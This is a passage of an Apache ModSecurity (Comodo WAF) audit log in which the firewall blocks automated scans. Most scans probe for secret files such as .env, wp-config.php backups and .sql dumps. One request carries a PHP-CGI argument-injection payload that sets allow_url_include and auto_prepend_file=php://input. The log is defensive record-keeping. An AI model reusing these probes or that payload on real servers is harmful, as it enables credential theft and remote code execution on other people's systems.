"HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745873405380761 2854 (- - -) Stopwatch2: 1745873405380761 2854; combined=973, p1=443, p2=499, p3=0, p4=0, p5=31, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --be08ba13-Z-- --62f57559-A-- [29/Apr/2025:03:50:05 +0700] aA_p_QW3ctMdWeqW3LOhXgAAAFU 103.236.140.4 48054 103.236.140.4 8181 --62f57559-B-- GET /var/logs/prod.log HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 154.83.103.204 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 154.83.103.204 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --62f57559-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --62f57559-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||manage.bataranetwork.com|F|2"] [data ".log"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745873405580437 2251 (- - -) Stopwatch2: 1745873405580437 2251; combined=850, p1=434, p2=382, p3=0, p4=0, p5=34, sr=118, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --62f57559-Z-- --dfb65528-A-- [29/Apr/2025:03:50:06 +0700] aA_p_gW3ctMdWeqW3LOhYwAAAEM 103.236.140.4 48066 103.236.140.4 8181 --dfb65528-B-- GET /web.config HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 154.83.103.204 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 154.83.103.204 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --dfb65528-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --dfb65528-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/Web.config" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745873406397316 673 (- - -) Stopwatch2: 1745873406397316 673; combined=266, p1=239, p2=0, p3=0, p4=0, p5=26, sr=70, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dfb65528-Z-- --58d0c92a-A-- [29/Apr/2025:03:50:08 +0700] aA_qAAW3ctMdWeqW3LOhaAAAAEk 103.236.140.4 48084 103.236.140.4 8181 --58d0c92a-B-- GET /app/etc/local.xml HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 154.83.103.204 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 154.83.103.204 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --58d0c92a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --58d0c92a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/app/etc/local.xml" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745873408968388 730 (- - -) Stopwatch2: 1745873408968388 730; combined=290, p1=258, p2=0, p3=0, p4=0, p5=32, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --58d0c92a-Z-- --7fba204e-A-- [29/Apr/2025:03:50:09 +0700] aA_qAQW3ctMdWeqW3LOhawAAAE0 103.236.140.4 48092 103.236.140.4 8181 --7fba204e-B-- GET /var/log/system.log HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 154.83.103.204 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 154.83.103.204 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --7fba204e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7fba204e-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||manage.bataranetwork.com|F|2"] [data ".log"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745873409365573 1833 (- - -) Stopwatch2: 1745873409365573 1833; combined=690, p1=346, p2=318, p3=0, p4=0, p5=26, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7fba204e-Z-- --c44f4972-A-- [29/Apr/2025:03:50:09 +0700] aA_qAQW3ctMdWeqW3LOhbAAAAE4 103.236.140.4 48094 103.236.140.4 8181 --c44f4972-B-- GET /var/log/exception.log HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 154.83.103.204 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 154.83.103.204 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --c44f4972-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c44f4972-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||manage.bataranetwork.com|F|2"] [data ".log"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745873409573784 2492 (- - -) Stopwatch2: 1745873409573784 2492; combined=855, p1=419, p2=411, p3=0, p4=0, p5=25, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c44f4972-Z-- --34d12c7d-A-- [29/Apr/2025:03:50:09 +0700] aA_qAQW3ctMdWeqW3LOhbQAAAE8 103.236.140.4 48096 103.236.140.4 8181 --34d12c7d-B-- GET /.wp-config.php.swp HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 154.83.103.204 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 154.83.103.204 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --34d12c7d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --34d12c7d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745873409799344 611 (- - -) Stopwatch2: 1745873409799344 611; combined=236, p1=210, p2=0, p3=0, p4=0, p5=26, sr=63, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --34d12c7d-Z-- --dda77c4d-A-- [29/Apr/2025:03:50:10 +0700] aA_qAgW3ctMdWeqW3LOhcAAAAFM 103.236.140.4 48104 103.236.140.4 8181 --dda77c4d-B-- GET /wp-content/debug.log HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 154.83.103.204 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 154.83.103.204 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --dda77c4d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --dda77c4d-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||manage.bataranetwork.com|F|2"] [data ".log"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745873410194725 1931 (- - -) Stopwatch2: 1745873410194725 1931; combined=708, p1=350, p2=330, p3=0, p4=0, p5=27, sr=74, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dda77c4d-Z-- --659f8f30-A-- [29/Apr/2025:03:50:10 +0700] aA_qAgW3ctMdWeqW3LOhcgAAAFc 103.236.140.4 48108 103.236.140.4 8181 --659f8f30-B-- GET /wp-json/wp/v2/users HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 154.83.103.204 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 154.83.103.204 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --659f8f30-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --659f8f30-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||manage.bataranetwork.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745873410625291 2826 (- - -) Stopwatch2: 1745873410625291 2826; combined=1255, p1=415, p2=813, p3=0, p4=0, p5=27, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --659f8f30-Z-- --fd1b7a5c-A-- [29/Apr/2025:03:50:16 +0700] aA_qCAW3ctMdWeqW3LOhgwAAAFY 103.236.140.4 48158 103.236.140.4 8181 --fd1b7a5c-B-- GET /backup.sql HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 154.83.103.204 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 154.83.103.204 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --fd1b7a5c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fd1b7a5c-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||manage.bataranetwork.com|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745873416358903 1873 (- - -) Stopwatch2: 1745873416358903 1873; combined=713, p1=364, p2=315, p3=0, p4=0, p5=33, sr=76, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fd1b7a5c-Z-- --9ce2ba27-A-- [29/Apr/2025:03:50:16 +0700] aA_qCAW3ctMdWeqW3LOhhQAAAFc 103.236.140.4 48164 103.236.140.4 8181 --9ce2ba27-B-- GET /db_backup.sql HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 154.83.103.204 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 154.83.103.204 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --9ce2ba27-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9ce2ba27-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||manage.bataranetwork.com|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745873416576750 1227 (- - -) Stopwatch2: 1745873416576750 1227; combined=430, p1=220, p2=194, p3=0, p4=0, p5=16, sr=47, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9ce2ba27-Z-- --cb59ad5e-A-- [29/Apr/2025:03:52:14 +0700] aA_qfsDCAfZpkPvVAPOdQAAAAIo 103.236.140.4 48620 103.236.140.4 8181 --cb59ad5e-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.87.86 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.87.86 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; ONEPLUS A6010) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36 Accept-Charset: utf-8 --cb59ad5e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cb59ad5e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745873534788341 814 (- - -) Stopwatch2: 1745873534788341 814; combined=347, p1=310, p2=0, p3=0, p4=0, p5=37, sr=114, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cb59ad5e-Z-- --ce2f163e-A-- [29/Apr/2025:03:53:53 +0700] aA_q4amWspnM_fF1r_5npwAAAAw 103.236.140.4 49002 103.236.140.4 8181 --ce2f163e-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 143.110.210.125 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 143.110.210.125 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --ce2f163e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ce2f163e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745873633789189 880 (- - -) Stopwatch2: 1745873633789189 880; combined=372, p1=337, p2=0, p3=0, p4=0, p5=35, sr=117, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ce2f163e-Z-- --faff0b72-A-- [29/Apr/2025:04:07:43 +0700] aA_uH8DCAfZpkPvVAPOeQQAAAIk 103.236.140.4 52294 103.236.140.4 8181 --faff0b72-B-- GET /wp-config.php HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 188.166.47.25 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http Accept: */* User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force Cookie: X-Forwarded-For: 188.166.47.25 Accept-Encoding: gzip X-Varnish: 136680971 --faff0b72-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --faff0b72-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745874463292042 789 (- - -) Stopwatch2: 1745874463292042 789; combined=348, p1=313, p2=0, p3=0, p4=0, p5=35, sr=144, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --faff0b72-Z-- --dd304e22-A-- [29/Apr/2025:04:38:02 +0700] aA_1OlaiXvaz3oCHN0ie6wAAAMI 103.236.140.4 59952 103.236.140.4 8181 --dd304e22-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.87.86 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.87.86 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; VOG-L29) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36 Accept-Charset: utf-8 --dd304e22-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --dd304e22-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745876282939047 840 (- - -) Stopwatch2: 1745876282939047 840; combined=363, p1=318, p2=0, p3=0, p4=0, p5=45, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dd304e22-Z-- --1c72f071-A-- [29/Apr/2025:04:46:37 +0700] aA_3PQW3ctMdWeqW3LOlMgAAAE8 103.236.140.4 33722 103.236.140.4 8181 --1c72f071-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.71.106 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.71.106 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.101 Safari/537.36 OPR/40.0.2308.62 Accept-Charset: utf-8 --1c72f071-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1c72f071-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745876797316914 843 (- - -) Stopwatch2: 1745876797316914 843; combined=388, p1=353, p2=0, p3=0, p4=0, p5=35, sr=114, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1c72f071-Z-- --e2439502-A-- [29/Apr/2025:06:16:40 +0700] aBAMWMDCAfZpkPvVAPOmKgAAAIU 103.236.140.4 54468 103.236.140.4 8181 --e2439502-B-- POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 194.233.88.144 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 194.233.88.144 X-Forwarded-Proto: http Connection: close Content-Length: 221 Accept: */* Upgrade-Insecure-Requests: 1 User-Agent: Custom-AsyncHttpClient Content-Type: application/x-www-form-urlencoded --e2439502-C-- --e2439502-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e2439502-E-- --e2439502-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745882200755402 4937 (- - -) Stopwatch2: 1745882200755402 4937; combined=3134, p1=521, p2=2580, p3=0, p4=0, p5=33, sr=79, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e2439502-Z-- --eb1ac07e-A-- [29/Apr/2025:08:00:13 +0700] aBAknQW3ctMdWeqW3LOwRAAAAEg 103.236.140.4 50254 103.236.140.4 8181 --eb1ac07e-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 35.216.255.218 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 35.216.255.218 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0 abuse.xmco.fr --eb1ac07e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --eb1ac07e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745888413533076 874 (- - -) Stopwatch2: 1745888413533076 874; combined=408, p1=367, p2=0, p3=0, p4=0, p5=41, sr=122, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --eb1ac07e-Z-- --68e57301-A-- [29/Apr/2025:08:20:23 +0700] aBApV8DCAfZpkPvVAPOuGgAAAJg 103.236.140.4 54978 103.236.140.4 8181 --68e57301-B-- GET /wp-config.php.orig HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 185.216.113.180 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.216.113.180 X-Forwarded-Proto: http Connection: close Accept: */* --68e57301-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --68e57301-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745889623391585 916 (- - -) Stopwatch2: 1745889623391585 916; combined=392, p1=340, p2=0, p3=0, p4=0, p5=52, sr=123, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --68e57301-Z-- --ebecc81e-A-- [29/Apr/2025:08:56:16 +0700] aBAxwMDCAfZpkPvVAPOwDAAAAII 103.236.140.4 35132 103.236.140.4 8181 --ebecc81e-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 143.110.210.125 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 143.110.210.125 X-Forwarded-Proto: https Connection: close User-Agent: 